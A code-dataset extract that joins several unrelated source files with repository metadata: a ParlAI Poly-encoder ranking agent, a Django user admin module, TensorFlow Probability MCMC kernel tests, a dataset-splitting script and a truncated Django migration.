"""
TransformerRankerAgent.add_cmdline_args(parser, partial_opt=partial_opt)
agent = parser.add_argument_group('Polyencoder Arguments')
agent.add_argument(
'--polyencoder-type',
type=str,
default='codes',
choices=['codes', 'n_first'],
help='Type of polyencoder, either we compute'
'vectors using codes + attention, or we '
'simply take the first N vectors.',
recommended='codes',
)
agent.add_argument(
'--poly-n-codes',
type=int,
default=64,
help='number of vectors used to represent the context'
'in the case of n_first, those are the number'
'of vectors that are considered.',
recommended=64,
)
agent.add_argument(
'--poly-attention-type',
type=str,
default='basic',
choices=['basic', 'sqrt', 'multihead'],
help='Type of the top aggregation layer of the poly-'
'encoder (where the candidate representation is'
'the key)',
recommended='basic',
)
agent.add_argument(
'--poly-attention-num-heads',
type=int,
default=4,
help='In case poly-attention-type is multihead, '
'specify the number of heads',
)
# Those arguments are here in case where polyencoder type is 'code'
agent.add_argument(
'--codes-attention-type',
type=str,
default='basic',
choices=['basic', 'sqrt', 'multihead'],
help='Type ',
recommended='basic',
)
agent.add_argument(
'--codes-attention-num-heads',
type=int,
default=4,
help='In case codes-attention-type is multihead, '
'specify the number of heads',
)
return agent
@classmethod
def upgrade_opt(cls, opt_from_disk: Opt):
# call the parent upgrades
opt_from_disk = super(PolyencoderAgent, cls).upgrade_opt(opt_from_disk)
polyencoder_attention_keys_value = opt_from_disk.get(
'polyencoder_attention_keys'
)
if polyencoder_attention_keys_value is not None:
# 2020-02-19 We are deprecating this flag because it was used for a one-time
# set of experiments and won't be used again. This flag was defaulted to
# 'context', so throw an exception otherwise.
if polyencoder_attention_keys_value == 'context':
del opt_from_disk['polyencoder_attention_keys']
else:
raise NotImplementedError(
'This --polyencoder-attention-keys mode (found in commit 06f0d9f) is no longer supported!'
)
return opt_from_disk
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.rank_loss = torch.nn.CrossEntropyLoss(reduce=True, size_average=True)
if self.use_cuda:
self.rank_loss.cuda()
def build_model(self, states=None):
"""
Return built model.
"""
return PolyEncoderModule(self.opt, self.dict, self.NULL_IDX)
def vectorize(self, *args, **kwargs):
"""
Add the start and end token to the labels.
"""
kwargs['add_start'] = True
kwargs['add_end'] = True
obs = super().vectorize(*args, **kwargs)
return obs
def _set_text_vec(self, *args, **kwargs):
"""
Add the start and end token to the text.
"""
obs = super()._set_text_vec(*args, **kwargs)
if 'text_vec' in obs and 'added_start_end_tokens' not in obs:
obs.force_set(
'text_vec', self._add_start_end_tokens(obs['text_vec'], True, True)
)
obs['added_start_end_tokens'] = True
return obs
def vectorize_fixed_candidates(self, *args, **kwargs):
"""
Vectorize fixed candidates.
Override to add start and end token when computing the candidate encodings in
interactive mode.
"""
kwargs['add_start'] = True
kwargs['add_end'] = True
return super().vectorize_fixed_candidates(*args, **kwargs)
def _make_candidate_encs(self, vecs):
"""
Make candidate encs.
The polyencoder module expects cand vecs to be 3D while torch_ranker_agent
expects it to be 2D. This requires a little adjustment (used in interactive mode
only)
"""
rep = super()._make_candidate_encs(vecs)
return rep.transpose(0, 1).contiguous()
def encode_candidates(self, padded_cands):
"""
Encode candidates.
"""
padded_cands = padded_cands.unsqueeze(1)
_, _, cand_rep = self.model(cand_tokens=padded_cands)
return cand_rep
def score_candidates(self, batch, cand_vecs, cand_encs=None):
"""
Score candidates.
The Poly-encoder encodes the candidate and context independently. Then, the
model applies additional attention before ultimately scoring a candidate.
"""
bsz = self._get_batch_size(batch)
ctxt_rep, ctxt_rep_mask, _ = self.model(**self._model_context_input(batch))
if cand_encs is not None:
if bsz == 1:
cand_rep = cand_encs
else:
cand_rep = cand_encs.expand(bsz, cand_encs.size(1), -1)
# bsz x num cands x seq len
elif len(cand_vecs.shape) == 3:
_, _, cand_rep = self.model(cand_tokens=cand_vecs)
# bsz x seq len (if batch cands) or num_cands x seq len (if fixed cands)
elif len(cand_vecs.shape) == 2:
_, _, cand_rep = self.model(cand_tokens=cand_vecs.unsqueeze(1))
num_cands = cand_rep.size(0) # will be bsz if using batch cands
cand_rep = cand_rep.expand(num_cands, bsz, -1).transpose(0, 1).contiguous()
scores = self.model(
ctxt_rep=ctxt_rep, ctxt_rep_mask=ctxt_rep_mask, cand_rep=cand_rep
)
return scores
def _get_batch_size(self, batch) -> int:
"""
Return the size of the batch.
Can be overridden by subclasses that do not always have text input.
"""
return batch.text_vec.size(0)
def _model_context_input(self, batch) -> Dict[str, Any]:
"""
Create the input context value for the model.
Must return a dictionary. This will be passed directly into the model via
`**kwargs`, i.e.,
>>> model(**_model_context_input(batch))
This is intentionally overridable so that richer models can pass additional
inputs.
"""
return {'ctxt_tokens': batch.text_vec}
def load_state_dict(self, state_dict):
"""
Override to account for codes.
"""
if self.model.type == 'codes' and 'codes' not in state_dict:
state_dict['codes'] = self.model.codes
super().load_state_dict(state_dict)
def _resize_token_embeddings(self, state_dict, msg=None):
"""
Resize the token embeddings when adding extra special tokens.
H/t TransformerGenerator._resize_token_embeddings for inspiration.
"""
# map extra special tokens carefully
new_size = self.model.encoder_ctxt.embeddings.weight.size()[0]
orig_size = state_dict['encoder_ctxt.embeddings.weight'].size()[0]
logging.info(f'Resizing token embeddings from {orig_size} to {new_size}')
if new_size <= orig_size:
# new size should be greater than original size,
# as we are adding special tokens
raise RuntimeError(msg)
for emb_weights in [
'encoder_ctxt.embeddings.weight',
'encoder_cand.embeddings.weight',
]:
# get new_embs
old_embs = state_dict[emb_weights]
new_embs = recursive_getattr(self.model, emb_weights).to(old_embs.device)
# copy over old weights
new_embs.data[:orig_size, :] = old_embs.data[:orig_size, :]
# reset in state dict
state_dict[emb_weights] = new_embs
return state_dict
class PolyEncoderModule(torch.nn.Module):
"""
Poly-encoder model.
See https://arxiv.org/abs/1905.01969 for more details
"""
def __init__(self, opt, dict_, null_idx):
super(PolyEncoderModule, self).__init__()
self.null_idx = null_idx
self.encoder_ctxt = self.get_encoder(
opt=opt,
dict_=dict_,
null_idx=null_idx,
reduction_type=None,
for_context=True,
)
self.encoder_cand = self.get_encoder(
opt=opt,
dict_=dict_,
null_idx=null_idx,
reduction_type=opt['reduction_type'],
for_context=False,
)
self.type = opt['polyencoder_type']
self.n_codes = opt['poly_n_codes']
self.attention_type = opt['poly_attention_type']
self.attention_num_heads = opt['poly_attention_num_heads']
self.codes_attention_type = opt['codes_attention_type']
self.codes_attention_num_heads = opt['codes_attention_num_heads']
embed_dim = opt['embedding_size']
# In case it's a polyencoder with code.
if self.type == 'codes':
# experimentally it seems that random with size = 1 was good.
codes = torch.empty(self.n_codes, embed_dim)
codes = torch.nn.init.uniform_(codes)
self.codes = torch.nn.Parameter(codes)
# The attention for the codes.
if self.codes_attention_type == 'multihead':
self.code_attention = MultiHeadAttention(
self.codes_attention_num_heads, embed_dim, opt['dropout']
)
elif self.codes_attention_type == 'sqrt':
self.code_attention = PolyBasicAttention(
self.type, self.n_codes, dim=2, attn='sqrt', get_weights=False
)
elif self.codes_attention_type == 'basic':
self.code_attention = PolyBasicAttention(
self.type, self.n_codes, dim=2, attn='basic', get_weights=False
)
# The final attention (the one that takes the candidate as key)
if self.attention_type == 'multihead':
self.attention = MultiHeadAttention(
self.attention_num_heads, opt['embedding_size'], opt['dropout']
)
else:
self.attention = PolyBasicAttention(
self.type,
self.n_codes,
dim=2,
attn=self.attention_type,
get_weights=False,
)
def get_encoder(self, opt, dict_, null_idx, reduction_type, for_context: bool):
"""
Return encoder, given options.
:param opt:
opt dict
:param dict:
dictionary agent
:param null_idx:
null/pad index into dict
:param reduction_type:
reduction type for the encoder
:param for_context:
whether this is the context encoder (as opposed to the candidate encoder).
Useful for subclasses.
:return:
a TransformerEncoder, initialized correctly
"""
embeddings = self._get_embeddings(
dict_=dict_, null_idx=null_idx, embedding_size=opt['embedding_size']
)
return TransformerEncoder(
opt=opt,
embedding=embeddings,
vocabulary_size=len(dict_),
padding_idx=null_idx,
reduction_type=reduction_type,
)
def _get_embeddings(self, dict_, null_idx, embedding_size):
embeddings = torch.nn.Embedding(
len(dict_), embedding_size, padding_idx=null_idx
)
torch.nn.init.normal_(embeddings.weight, 0, embedding_size ** -0.5)
return embeddings
def attend(self, attention_layer, queries, keys, values, mask):
"""
Apply attention.
:param attention_layer:
nn.Module attention layer to use for the attention
:param queries:
the queries for attention
:param keys:
the keys for attention
:param values:
the values for attention
:param mask:
mask for the attention keys
:return:
the result of applying attention to the values, with weights computed
wrt to the queries and keys.
"""
if keys is None:
keys = values
if isinstance(attention_layer, PolyBasicAttention):
return attention_layer(queries, keys, mask_ys=mask, values=values)
elif isinstance(attention_layer, MultiHeadAttention):
return attention_layer(queries, keys, values, mask)[0]
else:
raise Exception('Unrecognized type of attention')
def encode(
self, cand_tokens: Optional[torch.Tensor], **ctxt_inputs: torch.Tensor
) -> Tuple[Optional[torch.Tensor], Optional[torch.Tensor], Optional[torch.Tensor]]:
"""
Encode a text sequence.
:param ctxt_inputs:
Dictionary of context inputs. If not empty, should contain at least
'ctxt_tokens', a 2D long tensor of shape batchsize x sent_len
:param cand_tokens:
3D long tensor, batchsize x num_cands x sent_len
Note this will actually view it as a 2D tensor
:return:
(ctxt_rep, ctxt_mask, cand_rep)
- ctxt_rep 3D float tensor, batchsize x n_codes x dim
- ctxt_mask byte: batchsize x n_codes (all 1 in case
of polyencoder with code. Which are the vectors to use
in the ctxt_rep)
- cand_rep (3D float tensor) batchsize x num_cands x dim
"""
cand_embed = None
ctxt_rep = None
ctxt_rep_mask = None
if cand_tokens is not None:
assert len(cand_tokens.shape) == 3
bsz = cand_tokens.size(0)
num_cands = cand_tokens.size(1)
cand_embed = self.encoder_cand(cand_tokens.view(bsz * num_cands, -1))
cand_embed = cand_embed.view(bsz, num_cands, -1)
if len(ctxt_inputs) > 0:
assert 'ctxt_tokens' in ctxt_inputs
if ctxt_inputs['ctxt_tokens'] is not None:
assert len(ctxt_inputs['ctxt_tokens'].shape) == 2
bsz = self._get_context_batch_size(**ctxt_inputs)
# get context_representation. Now that depends on the cases.
ctxt_out, ctxt_mask = self.encoder_ctxt(
**self._context_encoder_input(ctxt_inputs)
)
dim = ctxt_out.size(2)
if self.type == 'codes':
ctxt_rep = self.attend(
self.code_attention,
queries=self.codes.repeat(bsz, 1, 1),
keys=ctxt_out,
values=ctxt_out,
mask=ctxt_mask,
)
ctxt_rep_mask = ctxt_rep.new_ones(bsz, self.n_codes).byte()
elif self.type == 'n_first':
# Expand the output if it is not long enough
if ctxt_out.size(1) < self.n_codes:
difference = self.n_codes - ctxt_out.size(1)
extra_rep = ctxt_out.new_zeros(bsz, difference, dim)
ctxt_rep = torch.cat([ctxt_out, extra_rep], dim=1)
extra_mask = ctxt_mask.new_zeros(bsz, difference)
ctxt_rep_mask = torch.cat([ctxt_mask, extra_mask], dim=1)
else:
ctxt_rep = ctxt_out[:, 0 : self.n_codes, :]
ctxt_rep_mask = ctxt_mask[:, 0 : self.n_codes]
return ctxt_rep, ctxt_rep_mask, cand_embed
def _get_context_batch_size(self, **ctxt_inputs: torch.Tensor) -> int:
"""
Return the batch size of the context.
Can be overridden by subclasses that do not always have text tokens in the
context.
"""
return ctxt_inputs['ctxt_tokens'].size(0)
def _context_encoder_input(self, ctxt_inputs: Dict[str, Any]) -> Dict[str, Any]:
"""
Return the inputs to the context encoder as a dictionary.
Must return a dictionary. This will be passed directly into the model via
`**kwargs`, i.e.,
>>> encoder_ctxt(**_context_encoder_input(ctxt_inputs))
This is needed because the context encoder's forward function may have different
argument names than that of the model itself. This is intentionally overridable
so that richer models can pass additional inputs.
"""
assert set(ctxt_inputs.keys()) == {'ctxt_tokens'}
return {'input': ctxt_inputs['ctxt_tokens']}
def score(self, ctxt_rep, ctxt_rep_mask, cand_embed):
"""
Score the candidates.
:param ctxt_rep:
3D float tensor, bsz x ctxt_len x dim
:param ctxt_rep_mask:
2D byte tensor, bsz x ctxt_len, in case there are some elements
of the ctxt that we should not take into account.
:param cand_embed: 3D float tensor, bsz x num_cands x dim
:return: scores, 2D float tensor: bsz x num_cands
"""
# reduces the context representation to a 3D tensor bsz x num_cands x dim
ctxt_final_rep = self.attend(
self.attention, cand_embed, ctxt_rep, ctxt_rep, ctxt_rep_mask
)
scores = torch.sum(ctxt_final_rep * cand_embed, 2)
return scores
def forward(
self,
cand_tokens=None,
ctxt_rep=None,
ctxt_rep_mask=None,
cand_rep=None,
**ctxt_inputs,
):
"""
Forward pass of the model.
Due to a limitation of parlai, we have to have one single model
in the agent. And because we want to be able to use data-parallel,
we need to have one single forward() method.
Therefore the operation_type can be either 'encode' or 'score'.
:param ctxt_inputs:
Dictionary of context inputs. Will include at least 'ctxt_tokens',
containing tokenized contexts
:param cand_tokens:
tokenized candidates
:param ctxt_rep:
(bsz x num_codes x hsz)
encoded representation of the context. If self.type == 'codes', these
are the context codes. Otherwise, they are the outputs from the
encoder
:param ctxt_rep_mask:
mask for ctxt rep
:param cand_rep:
encoded representation of the candidates
"""
if len(ctxt_inputs) > 0 or cand_tokens is not None:
return self.encode(cand_tokens=cand_tokens, **ctxt_inputs)
elif (
ctxt_rep is not None and ctxt_rep_mask is not None and cand_rep is not None
):
return self.score(ctxt_rep, ctxt_rep_mask, cand_rep)
raise Exception('Unsupported operation')
class PolyBasicAttention(BasicAttention):
"""
Override basic attention to account for edge case for polyencoder.
"""
def __init__(self, poly_type, n_codes, *args, **kwargs):
super().__init__(*args, **kwargs)
self.poly_type = poly_type
self.n_codes = n_codes
def forward(self, *args, **kwargs):
"""
Forward pass.
Account for accidental dimensionality reduction when num_codes is 1 and the
polyencoder type is 'codes'
"""
lhs_emb = super().forward(*args, **kwargs)
if self.poly_type == 'codes' and self.n_codes == 1 and len(lhs_emb.shape) == 2:
lhs_emb = lhs_emb.unsqueeze(self.dim - 1)
return lhs_emb
class IRFriendlyPolyencoderAgent(AddLabelFixedCandsTRA, PolyencoderAgent):
"""
Poly-encoder agent that allows for adding label to fixed cands.
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
"""
Add cmd line args.
"""
AddLabelFixedCandsTRA.add_cmdline_args(parser, partial_opt=partial_opt)
PolyencoderAgent.add_cmdline_args(parser, partial_opt=partial_opt)
return parser
| 37.680203
| 111
| 0.586915
|
794fe58c0313ee36dd73a228e17c9ec7c2ecf884
| 2,244
|
py
|
Python
|
accounts/admin.py
|
mtuktarov/mtuktarov.com
|
82a3b70da1f81e49f5df0d4c98fd213372c3a7bc
|
[
"MIT"
] | null | null | null |
accounts/admin.py
|
mtuktarov/mtuktarov.com
|
82a3b70da1f81e49f5df0d4c98fd213372c3a7bc
|
[
"MIT"
] | null | null | null |
accounts/admin.py
|
mtuktarov/mtuktarov.com
|
82a3b70da1f81e49f5df0d4c98fd213372c3a7bc
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from django.contrib.auth.forms import ReadOnlyPasswordHashField
# Register your models here.
from .models import BlogUser
from django.utils.translation import gettext, gettext_lazy as _
from django.contrib.auth.forms import UsernameField
class BlogUserCreationForm(forms.ModelForm):
password1 = forms.CharField(label='Введите пароль', widget=forms.PasswordInput)
password2 = forms.CharField(label='Еще!', widget=forms.PasswordInput)
class Meta:
model = BlogUser
fields = ('email',)
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Пароли не совпадают")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.source = 'adminsite'
user.save()
return user
class BlogUserChangeForm(UserChangeForm):
password = ReadOnlyPasswordHashField(
label=_("Password"),
help_text=_(
"Мы не храним пароли в открытом виде. Поэтому понятия не имеем, что вы "
"там напридумывали! Но фантазию приветствуем. напридумывать снова можно"
"<a href=\"{}\">перейдя по этой ссылке</a>."
),
)
email = forms.EmailField(label="Email", widget=forms.EmailInput)
class Meta:
model = BlogUser
fields = '__all__'
field_classes = {'username': UsernameField}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class BlogUserAdmin(UserAdmin):
form = BlogUserChangeForm
add_form = BlogUserCreationForm
list_display = ('id', 'nickname', 'username', 'email', 'last_login', 'date_joined', 'source')
list_display_links = ('id', 'username')
ordering = ('-id',)
| 35.0625
| 97
| 0.680036
|
794fe5b636d673855828a5eec038bb101309e95d
| 11,213
|
py
|
Python
|
tensorflow_probability/python/mcmc/transformed_kernel_test.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | 1
|
2020-07-12T22:40:42.000Z
|
2020-07-12T22:40:42.000Z
|
tensorflow_probability/python/mcmc/transformed_kernel_test.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | 2
|
2019-08-01T18:31:41.000Z
|
2019-08-01T19:42:15.000Z
|
tensorflow_probability/python/mcmc/transformed_kernel_test.py
|
nxdao2000/probability
|
33d2bc1cb0e7b6284579ea7f3692b9d056e0d700
|
[
"Apache-2.0"
] | 1
|
2020-04-17T18:01:47.000Z
|
2020-04-17T18:01:47.000Z
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for `TransformedTransitionKernel` `TransitionKernel`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Dependency imports
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
tfd = tfp.distributions
tfb = tfp.bijectors
FakeInnerKernelResults = collections.namedtuple(
'FakeInnerKernelResults', ['target_log_prob'])
def _maybe_seed(seed):
if tf.executing_eagerly():
tf.compat.v1.set_random_seed(seed)
return None
return seed
class FakeInnerKernel(tfp.mcmc.TransitionKernel):
"""Fake Transition Kernel."""
def __init__(self, target_log_prob_fn):
self._parameters = dict(target_log_prob_fn=target_log_prob_fn)
@property
def parameters(self):
return self._parameters
@property
def is_calibrated(self):
return True
def one_step(self, current_state, previous_kernel_results):
pass
def bootstrap_results(self, init_state):
return FakeInnerKernelResults(
target_log_prob=self._parameters['target_log_prob_fn'](init_state))
@test_util.run_all_in_graph_and_eager_modes
class TransformedTransitionKernelTest(tf.test.TestCase):
def setUp(self):
super(TransformedTransitionKernelTest, self).setUp()
self.dtype = np.float32
def test_support_works_correctly_with_HMC(self):
num_results = 2000
target = tfd.Beta(
concentration1=self.dtype(1.),
concentration0=self.dtype(10.))
transformed_hmc = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=tf.function(target.log_prob, autograph=False),
step_size=1.64,
num_leapfrog_steps=2,
seed=_maybe_seed(55)),
bijector=tfb.Sigmoid())
# Recall, tfp.mcmc.sample_chain calls
# transformed_hmc.bootstrap_results too.
states, kernel_results = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* bijector.forward.
current_state=self.dtype(0.25),
kernel=transformed_hmc,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
sample_var = tf.reduce_mean(
input_tensor=tf.math.squared_difference(states, sample_mean), axis=0)
[
sample_mean_,
sample_var_,
is_accepted_,
true_mean_,
true_var_,
] = self.evaluate([
sample_mean,
sample_var,
kernel_results.inner_results.is_accepted,
target.mean(),
target.variance(),
])
self.assertAllClose(true_mean_, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_var_, sample_var_,
atol=0.01, rtol=0.1)
self.assertNear(0.6, is_accepted_.mean(), err=0.05)
def test_support_works_correctly_with_MALA(self):
num_results = 2000
target = tfd.Beta(
concentration1=self.dtype(1.),
concentration0=self.dtype(10.))
transformed_mala = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.MetropolisAdjustedLangevinAlgorithm(
target_log_prob_fn=tf.function(target.log_prob, autograph=False),
step_size=1.,
seed=_maybe_seed(55)),
bijector=tfb.Sigmoid())
# Recall, tfp.mcmc.sample_chain calls
# transformed_hmc.bootstrap_results too.
states, _ = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* bijector.forward.
current_state=self.dtype(0.25),
kernel=transformed_mala,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
sample_var = tf.reduce_mean(
input_tensor=tf.math.squared_difference(states, sample_mean), axis=0)
[
sample_mean_,
sample_var_,
true_mean_,
true_var_,
] = self.evaluate([
sample_mean,
sample_var,
target.mean(),
target.variance(),
])
self.assertAllClose(true_mean_, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_var_, sample_var_,
atol=0.01, rtol=0.1)
def test_support_works_correctly_with_RWM(self):
num_results = 2000
target = tfd.Beta(
concentration1=self.dtype(1.),
concentration0=self.dtype(10.))
transformed_rwm = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.RandomWalkMetropolis(
target_log_prob_fn=tf.function(target.log_prob, autograph=False),
new_state_fn=tfp.mcmc.random_walk_normal_fn(scale=1.5),
seed=_maybe_seed(55)),
bijector=tfb.Sigmoid())
# Recall, tfp.mcmc.sample_chain calls
# transformed_hmc.bootstrap_results too.
states, _ = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* bijector.forward.
current_state=self.dtype(0.25),
kernel=transformed_rwm,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
sample_var = tf.reduce_mean(
input_tensor=tf.math.squared_difference(states, sample_mean), axis=0)
[
sample_mean_,
sample_var_,
true_mean_,
true_var_,
] = self.evaluate([
sample_mean,
sample_var,
target.mean(),
target.variance(),
])
self.assertAllClose(true_mean_, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_var_, sample_var_,
atol=0.01, rtol=0.1)
def test_end_to_end_works_correctly(self):
true_mean = self.dtype([0, 0])
true_cov = self.dtype([[1, 0.5],
[0.5, 1]])
num_results = 2000
def target_log_prob(x, y):
# Corresponds to unnormalized MVN.
# z = matmul(inv(chol(true_cov)), [x, y] - true_mean)
z = tf.stack([x, y], axis=-1) - true_mean
z = tf.squeeze(
tf.linalg.triangular_solve(
np.linalg.cholesky(true_cov),
z[..., tf.newaxis]),
axis=-1)
return -0.5 * tf.reduce_sum(input_tensor=z**2., axis=-1)
transformed_hmc = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=tf.function(target_log_prob, autograph=False),
# Affine scaling means we have to change the step_size
# in order to get 60% acceptance, as was done in mcmc/hmc_test.py.
step_size=[1.23 / 0.75, 1.23 / 0.5],
num_leapfrog_steps=2,
seed=_maybe_seed(54)),
bijector=[
tfb.AffineScalar(scale=0.75),
tfb.AffineScalar(scale=0.5),
])
# Recall, tfp.mcmc.sample_chain calls
# transformed_hmc.bootstrap_results too.
states, kernel_results = tfp.mcmc.sample_chain(
num_results=num_results,
# The initial state is used by inner_kernel.bootstrap_results.
# Note the input is *after* `bijector.forward`.
current_state=[self.dtype(-2), self.dtype(2)],
kernel=transformed_hmc,
num_burnin_steps=200,
num_steps_between_results=1,
parallel_iterations=1)
states = tf.stack(states, axis=-1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(input_tensor=states, axis=0)
x = states - sample_mean
sample_cov = tf.matmul(x, x, transpose_a=True) / self.dtype(num_results)
[sample_mean_, sample_cov_, is_accepted_] = self.evaluate([
sample_mean, sample_cov, kernel_results.inner_results.is_accepted])
self.assertNear(0.6, is_accepted_.mean(), err=0.05)
self.assertAllClose(true_mean, sample_mean_,
atol=0.06, rtol=0.)
self.assertAllClose(true_cov, sample_cov_,
atol=0., rtol=0.1)
def test_bootstrap_requires_xor_args(self):
def fake_target_log_prob(x):
return -x**2 / 2.
transformed_fake = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=FakeInnerKernel(target_log_prob_fn=fake_target_log_prob),
bijector=tfb.Exp())
with self.assertRaisesWithPredicateMatch(
ValueError, r'Must specify exactly one'):
transformed_fake.bootstrap_results()
with self.assertRaisesWithPredicateMatch(
ValueError, r'Must specify exactly one'):
transformed_fake.bootstrap_results(
init_state=2., transformed_init_state=np.log(2.))
def test_bootstrap_correctly_untransforms(self):
def fake_target_log_prob(x):
return -x**2 / 2.
transformed_fake = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=FakeInnerKernel(target_log_prob_fn=fake_target_log_prob),
bijector=tfb.Exp())
automatic_pkr, manual_pkr = self.evaluate([
transformed_fake.bootstrap_results(2.),
transformed_fake.bootstrap_results(transformed_init_state=[4., 5.]),
])
self.assertNear(np.log(2.), automatic_pkr.transformed_state, err=1e-6)
self.assertAllClose(
[4., 5.], manual_pkr.transformed_state, atol=0., rtol=1e-6)
def test_copy_works(self):
def fake_target_log_prob(x):
return -x**2 / 2.
transformed = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=FakeInnerKernel(target_log_prob_fn=fake_target_log_prob),
bijector=tfb.AffineScalar(2.))
transformed_copy = tfp.mcmc.TransformedTransitionKernel(
**transformed.parameters)
pkr, pkr_copy = self.evaluate([
transformed.bootstrap_results(1.),
transformed_copy.bootstrap_results(1.)
])
self.assertAllClose(pkr.inner_results.target_log_prob,
pkr_copy.inner_results.target_log_prob)
if __name__ == '__main__':
tf.test.main()
| 36.288026
| 95
| 0.675198
|
794fe73d96b0a0802c06268dd28084b7e47c45cb
| 881
|
py
|
Python
|
scripts/make_Txt.py
|
COEN-390/YOLOv5-Lite
|
06a53f5d001c5d37729f55f47cbd46cc8eb63f84
|
[
"MIT"
] | null | null | null |
scripts/make_Txt.py
|
COEN-390/YOLOv5-Lite
|
06a53f5d001c5d37729f55f47cbd46cc8eb63f84
|
[
"MIT"
] | null | null | null |
scripts/make_Txt.py
|
COEN-390/YOLOv5-Lite
|
06a53f5d001c5d37729f55f47cbd46cc8eb63f84
|
[
"MIT"
] | 1
|
2021-09-03T01:16:31.000Z
|
2021-09-03T01:16:31.000Z
|
import os
import random
trainval_percent = 0.1
train_percent = 0.9
xmlfilepath = 'data/Person1K/Annotations'
txtsavepath = 'data/Person1K/ImageSets'
total_xml = os.listdir(xmlfilepath)
num = len(total_xml)
list = range(num)
tv = int(num * trainval_percent)
tr = int(tv * train_percent)
trainval = random.sample(list, tv)
train = random.sample(trainval, tr)
ftrainval = open('data\Person1K\ImageSets/trainval.txt', 'w')
ftest = open('data\Person1K\ImageSets/test.txt', 'w')
ftrain = open('data\Person1K\ImageSets/train.txt', 'w')
fval = open('data\Person1K\ImageSets/val.txt', 'w')
for i in list:
name = total_xml[i][:-4] + '\n'
if i in trainval:
ftrainval.write(name)
if i in train:
ftest.write(name)
else:
fval.write(name)
else:
ftrain.write(name)
ftrainval.close()
ftrain.close()
fval.close()
ftest.close()
| 24.472222
| 61
| 0.673099
|
794fe88f64243e31adb84e0f4495980c23c96f9d
| 1,927
|
py
|
Python
|
backend/api/migrations/0010_advertsettings_mimeuser_timeline.py
|
Kovszasz/MYG
|
fc932bef8b67d568ac60bba5604009550570fca9
|
[
"MIT"
] | null | null | null |
backend/api/migrations/0010_advertsettings_mimeuser_timeline.py
|
Kovszasz/MYG
|
fc932bef8b67d568ac60bba5604009550570fca9
|
[
"MIT"
] | 7
|
2020-06-06T00:58:09.000Z
|
2022-02-26T20:03:02.000Z
|
backend/api/migrations/0010_advertsettings_mimeuser_timeline.py
|
Kovszasz/MYG
|
fc932bef8b67d568ac60bba5604009550570fca9
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-10-16 18:54
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0011_update_proxy_permissions'),
('api', '0009_mods'),
]
operations = [
migrations.CreateModel(
name='AdvertSettings',
fields=[
('admin', models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('AdFrequency', models.IntegerField(default=50)),
('MoneyForSeen', models.FloatField(default=0)),
('MoneyForClick', models.FloatField(default=0)),
],
),
migrations.CreateModel(
name='TimeLine',
fields=[
('date', models.DateField(auto_now_add=True)),
('content_post', models.ForeignKey(blank=True, default='', on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='api.Post')),
('post_from_last_advert', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='MimeUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile_pic', models.ImageField(blank=True, upload_to='profile')),
('IsAdvertiser', models.BooleanField(default=False)),
('company', models.CharField(default='', max_length=100)),
